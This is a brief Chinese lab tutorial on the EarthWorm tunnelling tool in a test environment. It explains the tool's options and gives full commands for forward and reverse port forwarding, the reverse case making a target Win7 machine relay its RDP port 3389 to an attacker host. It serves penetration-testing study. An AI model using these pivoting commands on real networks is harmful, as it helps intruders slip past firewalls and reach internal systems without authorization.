EW使用

靶机 win7 192.168.5.101
攻击机 win 10 192.168.0.31
攻击机 kali 192.168.5.102

1）ew 自身的各个选项用途说明

-l 指定要监听的本地端口
-d 指定要反弹到的机器 ip
-e 指定要反弹到的机器端口
-f 指定要主动连接的机器 ip
-g 指定要主动连接的机器端口
-t 指定超时时长,默认为 1000

2）执行正向转发

在kali执行

./ew_for_Linux32 -s lcx_tran -l 1080 -f 192.168.5.101 -g 3389

将win7的3389转发到本地的1080端口，访问kali的1080既访问win7的3389

3）执行反向 端口转发

攻击机win10执行，监听1080收到8080的数据

ew_for_win_32.exe -s lcx_listen -l 1080 -e 8080

靶机win7执行，将本地3389转发到win10 8080端口

ew_for_Win.exe -s lcx_slave -d 192.168.0.31 -e 8080 -f 192.168.5.101 -g 3389

现在连接win10的1080既win7的3389